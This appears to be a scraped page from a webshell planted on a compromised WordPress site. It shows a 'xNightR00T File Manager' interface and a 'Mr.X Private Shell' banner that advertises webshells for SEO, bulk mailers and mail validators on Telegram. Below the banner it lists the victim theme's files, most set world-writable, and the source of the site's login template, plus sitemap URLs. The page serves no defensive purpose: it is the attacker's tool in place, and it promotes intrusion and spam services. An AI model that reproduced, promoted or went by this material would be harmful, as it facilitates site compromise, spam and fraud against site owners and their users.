xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php
/*
 Template Name: Login Page
 */
?>
<?php if(is_user_logged_in()) wp_safe_redirect(site_url()); ?>
<?php get_header(); ?>
<?php
    $txtEmail = "Email";
    $txtEmailPlaceholder = "Enter your email address";
    $txtPassword = "Password";
    $txtPasswordPlaceholder = "Enter your password";
    $txtForgot = "Forgot password?";
    $txtSignup = "Don't have an account?";
    $txtSignup2 = "Sign Up";
    $txtLogin = "Login";

    if ( get_locale() == 'ja') {
        $txtLogin = "ログイン ";
        $txtEmail = "メール ";
        $txtEmailPlaceholder = "メールアドレスを入力してください";
        $txtPassword = "パスワード ";
        $txtPasswordPlaceholder = "パスワードを入力してください";
        $txtForgot = " パスワードを忘れましたか?";
        $txtSignup = "アカウントをお持ちでないですか?";
        $txtSignup2 = "登録";
    }

?>
<main id="main">

<!-- ======= Values Form ======= -->
<section class="form-contact">
    <div class="container">
        <div class="row gx-0">
            <div class="bg-form-contact col-md-9 mx-auto">
                <div class="form-contact">
                    <section class="forms">
                        <div class="form login">
                            <div class="form-content p-4">
                                <header> <?php echo $txtLogin; ?></header>
                                <div class="mb-20">
                                    <p class="alert-success"></p>
                                    <p class="status"></p>
                                </div>
                                <form id="login_form" method="POST">
                                    <p class="status"></p>
                                    <div class="field input-field">
                                        <label for="name" class="form-label"><?php echo $txtEmail; ?><span class="req"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">*</font></font></span></label>
                                        <input maxlength="255" type="text" name="email" id="username" placeholder="<?php echo $txtEmailPlaceholder; ?>" class="input">
                                    </div>

                                    <div class="field input-field m-0">
                                        <label for="password" class="form-label"><?php echo $txtPassword; ?><span class="req"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">*</font></font></span></label>
                                        <input maxlength="20" type="password" name="password" id="password" placeholder="<?php echo $txtPasswordPlaceholder; ?>" class="password">
                                        <i class='bx bx-hide eye-icon'></i>
                                    </div>
                                    <div class="field input-field m-0">
                                        <div id="inline-badge"></div>
                                    </div>

                                    <div class="field button-field">
                                        <button  id="submit" class="btn btn-submit" type="submit"><?php echo $txtLogin; ?></button>
                                    </div>
                                    <?php wp_nonce_field( 'ajax-login-nonce', 'security' ); ?>
                                </form>

                                <div class="form-link">
                                    <span><?php echo $txtSignup; ?>&ensp;<a style="cursor: pointer;" onclick="location.href='<?php echo home_url() . '/sign-up/'; ?>'"class="link signup-link"><?php echo $txtSignup2; ?></a></span>
                                    <a href="<?php echo home_url() . "/forgots-password"; ?>" class="forgot-pass"><?php echo $txtForgot; ?></a>
                                </div>
                            </div>
                        </div>
                    </section>
                </div>
            </div>
        </div>
    </div>
</section><!-- End Values Section -->



</main><!-- End #main -->
<?php
 global $wp_query;
 $postID = $wp_query->post->ID;
 $footer = get_post_meta($postID, "footer", true);
 get_footer($footer);
 wp_reset_query();
?>
<link href='https://unpkg.com/boxicons@2.1.2/css/boxicons.min.css' rel='stylesheet'>
<link href='<?php echo get_template_directory_uri(); ?>/css/common.css' rel='stylesheet'>
<style>

.form.signup{
    opacity: 0;
    pointer-events: none;
}
.forms.show-signup .form.signup{
    opacity: 1;
    pointer-events: auto;
}
.forms.show-signup .form.login{
    opacity: 0;
    pointer-events: none;
}
.line{
    position: relative;
    height: 1px;
    width: 100%;
    margin: 36px 0;
    background-color: #d4d4d4;
}
.line::before{
    content: 'Or';
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    background-color: #FFF;
    color: #8b8b8b;
    padding: 0 15px;
}

</style>

<script>
     const forms = document.querySelector(".forms"),
      pwShowHide = document.querySelectorAll(".eye-icon"),
      links = document.querySelectorAll(".link");

pwShowHide.forEach(eyeIcon => {
    eyeIcon.addEventListener("click", () => {
        let pwFields = eyeIcon.parentElement.parentElement.querySelectorAll(".password");
        
        pwFields.forEach(password => {
            if(password.type === "password"){
                password.type = "text";
                eyeIcon.classList.replace("bx-hide", "bx-show");
                return;
            }
            password.type = "password";
            eyeIcon.classList.replace("bx-show", "bx-hide");
        })
        
    })
})      

links.forEach(link => {
    link.addEventListener("click", e => {
       e.preventDefault(); //preventing form submit
       forms.classList.toggle("show-signup");
    })
})
</script>

Filemanager

Name Type Size Permission Actions
assets Folder 0775
bbpress Folder 0775
css Folder 0775
fonts Folder 0775
functions Folder 0775
images Folder 0775
includes Folder 0775
js Folder 0775
languages Folder 0775
muffin-options Folder 0775
tribe-events Folder 0775
vc_templates Folder 0775
woocommerce Folder 0775
.SignUp.php.swp File 20 KB 0777
404.php File 128.13 KB 0777
SignIn.php File 5.9 KB 0777
SignUp.php File 21.46 KB 0775
bbpress.php File 598 B 0777
category-business.php File 6.41 KB 0775
category-chinh-tri.php File 6.41 KB 0775
category-customs.php File 6.41 KB 0775
category-green-growth.php File 6.41 KB 0775
category-headline-ja.php File 6.41 KB 0775
category-headline.php File 6.41 KB 0775
category-infographics.php File 6.41 KB 0775
category-kinh-te.php File 6.82 KB 0775
category-report.php File 6.82 KB 0775
category-tax-customs.php File 6.83 KB 0775
category-vietnam-investment-review.php File 6.84 KB 0775
changelog.html File 110.57 KB 0777
comments.php File 1.24 KB 0777
footer.php File 5.44 KB 0777
forgot-password.php File 1.73 KB 0775
functions.php File 40.53 KB 0775
header-shop.php File 4.78 KB 0777
header.php File 5.07 KB 0777
index.php File 8.11 KB 0777
login.php File 6.86 KB 0777
page.php File 2.33 KB 0775
readme.txt File 102 B 0777
register.php File 7.81 KB 0777
reset-password.php File 2.4 KB 0777
rtl.css File 33.09 KB 0777
screenshot.png File 179.96 KB 0777
search.php File 3.74 KB 0777
searchform.php File 831 B 0777
sidebar.php File 1.97 KB 0775
single-attachment.php File 706 B 0777
single-download.php File 4.15 KB 0777
single-portfolio.php File 2.21 KB 0777
single.php File 1.69 KB 0777
style-colors.php File 34.96 KB 0777
style-one.php File 22.26 KB 0777
style-responsive.php File 26.39 KB 0777
style.css File 361 B 0777
style.php File 51.65 KB 0775
taxonomy-portfolio-types.php File 5.34 KB 0777
template-archives.php File 1.89 KB 0777
template-blank.php File 971 B 0777
template-portfolio.php File 6.12 KB 0777
template-sitemap.php File 597 B 0777
text.php File 69 B 0777
under-construction.php File 5.37 KB 0777
wpml-config.xml File 12.23 KB 0777
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml